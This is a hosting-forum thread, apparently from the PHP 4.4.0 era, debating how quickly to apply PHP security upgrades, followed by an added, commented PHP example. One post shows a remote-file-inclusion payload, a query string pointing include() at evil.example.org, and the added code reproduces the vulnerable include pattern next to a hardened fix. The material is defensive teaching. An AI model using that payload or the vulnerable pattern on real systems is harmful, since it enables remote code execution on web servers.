Got a question from a user who has been told that the PHP version on my server is very old... uh... PHP 4.4.0 just came out, and from the feedback, it's not worth upgrading to PHP 4.4.0, and most web apps don't support PHP 5.
Why do people want the latest version when it is not stable or widely supported?
BuyHTTP Internet Services - In business since 2003 Business Hosting | nginx, CloudLinux, Varnish cache, and CDP with every business account
Shared, Reseller, Semi Dedicated, VPS, Cloud, Dedicated - We can grow with you
Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
Since php.net says for every such security/bugfix release that everyone should update ASAP, it doesn't sound to me like a "customer's whim". For me it's rather the opposite; IMO my customers have every right to expect me to keep crucial system components up to date. Some of the big exploits in scripts like phpBB were PHP version dependent, i.e. when one had the latest PHP version at the point of the exploit, the server was safe from it.
At any rate, on Windows I'm also for the "if it ain't broken, don't fix it" strategy because it's really true, just had to restore a Windows 2003 Server last week because one of the latest small security patches from Windows Update broke just about everything, the computer wasn't working right any more. OTOH on GNU/Linux this is rather unlikely to happen, with commercial addons like cPanel/WHM it happens now and then, but with the core system it's a very rare thing. Years ago when I was mainly using Windows I never patched anything that worked, but after years of having administered GNU/Linux webservers and using Mac OS X at home, I got into the habit of always keeping things on the latest.
Originally posted by RambOrc Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
If it ain't broken... you know the old saying, and like someone already said, 4.3.11 is not that much different from 4.4.0. The security risk is rather very small. Software bugs are always there; it's only a matter of seriously bad or minor bad.
In this case 4.4.0 only fixes some minor bugs that won't pose much of a threat to the server.
The "it ain't broken" proverb means to me rather that even though Fedora Core 4 is out, I leave a Fedora Core 2 server the way it is, updating it neither to C3 nor to C4. But for me it doesn't mean leaving things unpatched within C2. Same with PHP, 4.4.0 "addresses a serious memory corruption problem" and that's not to be taken lightly IMO.
Originally posted by asbhost What kind of directives are we talking about here? Share with us so that everybody knows.
What I mean is nothing new. You should always disable certain functions you feel are not safe or you won't need.
Just to give you an example:
Imagine you have this script on your site
With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:
If allow_url_fopen is enabled (which it is by default), this will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it has been used many times.
This is just a basic example of what you need to modify, bearing in mind the vulnerabilities discovered. If you get a way of doing this you shouldn't bother to upgrade. Most of the time there's another way round.
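The pattern asbhost describes (a variable path fed into include() under register_globals, made remotely reachable by allow_url_fopen) and the hardened alternative, written out as an added example; this is not code from the thread, and the fragment directory, the "page" query parameter, the fragment file names and the allowlist are assumptions constructed for illustration.

```php
<?php
// Added example, not code from the original thread. Assumed layout: page
// fragments live in ./fragments/ next to this file; the query parameter
// "page" and the fragment names below are constructed for illustration.

// --- 1. Vulnerable pattern (the kind of script the post describes) -------
// With register_globals=On, a request ?path=http://evil.example.org/? sets
// the global $path before this code runs, so the include() becomes
// include 'http://evil.example.org/?header.php'; and with allow_url_fopen=On
// PHP fetches and executes whatever that host returns.
function render_header_vulnerable()
{
    global $path;                 // silently populated from the query string
    include $path . 'header.php';
}

// --- 2. Hardened pattern --------------------------------------------------
// (a) request data never reaches include() directly, (b) the file is chosen
// from a fixed allowlist, (c) the resolved path is confirmed to stay inside
// the fragments directory even if the allowlist is edited carelessly later.
$ALLOWED_FRAGMENTS = array(
    'home'    => 'header_home.php',
    'contact' => 'header_contact.php',
);

function resolve_fragment($requested, $allowed, $base_dir)
{
    if (!isset($allowed[$requested])) {
        return false;             // unknown key: refuse rather than guess
    }
    $root      = realpath($base_dir);
    $candidate = realpath($base_dir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($root === false || $candidate === false) {
        return false;             // directory or fragment does not exist
    }
    // realpath() has already collapsed any ../ segments; now require that the
    // result lies strictly below the fragments directory.
    if (strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $candidate;
}

function render_header_hardened($allowed)
{
    $key  = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
    $file = resolve_fragment($key, $allowed, dirname(__FILE__) . '/fragments');
    if ($file === false) {
        header('HTTP/1.0 404 Not Found');
        return;
    }
    include $file;
}

// --- 3. Configuration check for the directives the post names ------------
// Returns the directives that make pattern 1 exploitable if they are on.
// The fix belongs in php.ini (register_globals = Off, allow_url_fopen = Off)
// rather than in every script; this function only reports the current state.
function risky_ini_settings()
{
    $findings = array();
    foreach (array('register_globals', 'allow_url_fopen') as $directive) {
        $value = (string) ini_get($directive);
        if ($value === '1' || strtolower($value) === 'on') {
            $findings[] = $directive . ' is enabled';
        }
    }
    return $findings;
}

// Usage: call risky_ini_settings() from a one-off admin script and review the
// result; pages should be built with render_header_hardened($ALLOWED_FRAGMENTS).
```

The allowlist is the real control here: even with allow_url_fopen turned off, a user-controlled path in include() still reaches the local filesystem, so the realpath() containment check guards against that case as well.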
The general rule for upgrades is this. There is a VAST difference between the users that use PHP and the people that help develop it.
When they say UPGRADE NOW! it all depends on how severe the security fix is. That is up to the interpretation of a skilled PHP programmer to make that decision.
A time to upgrade would be if you need to run a script that needs a minimum version that you may not have installed.
Otherwise there is very little reason to upgrade your PHP versions. The reason is this... when a new version comes out sometimes that new version actually INTRODUCES NEW BUGS! So, upgrading right away may screw yourself when you think it was helping...
Sometimes patience is a great virtue... upgrade at Milestone releases or after a while.
Upgrade if you're a knowledgeable PHP guy and demand that security fix.
Otherwise, stay cool and let the new version "settle a bit" before upgrading right away.
DigiPanel - Web Host Control Panel http://digipanel.com
Offering Free Licenses to ISP's and Hosting Companies!
Last December's big phpBB hack wave where Google was at fault too was partially a result of a PHP security issue, which could be fixed with a PHP version (4.3.9 or 10 I think) that was released some time previously. Sysadmins who went with the "if it ain't broken, don't fix it" proverb spent quite a lot of time with restoring accounts and dealing with user complaints.